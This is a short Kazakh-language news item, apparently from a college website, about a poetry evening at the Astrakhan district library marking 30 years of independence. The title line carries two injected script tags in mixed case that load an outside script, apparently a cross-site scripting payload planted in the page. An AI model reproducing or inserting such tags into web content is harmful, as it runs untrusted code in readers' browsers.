"Өнер алды қызыл тіл" поэзия кеші<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

17.09.2021

15 қыркүйек күні Астрахан аудандық кітапханасында Қазақстан Республикасы Тәуелсіздігінің 30 жылдығына және Қазақстан халықтарының тілдері күніне арналған "Өнер алды қызыл тіл" атты поэзия кеші өтті. Поэзия кешіне №1, №2 Жалпы білім беретін мектептерінің оқушылары, сондай-ақ біздің колледж студенттері Турдимурат Мейримхан, Щербина Татьяна, Кудайбергенова Айымгуль қатысты. Қазақ, орыс және басқа да классиктердің шығармалары түрлі тілдерде орындалды. Іс-шараға қатысушылар грамоталармен, сондай-ақ сыйлықтармен марапатталды. Іс-шараның мақсаты: Қазақстан Халықтарының мәдени мұрасын құрметтеу, ана тілі мен Отанға деген сүйіспеншілік пен құрмет, өскелең ұрпақтың бойында патриотизмді қалыптастыру.

Просмотров: 1103


Пікір қосу



Деректерді қолтаңбаға қосу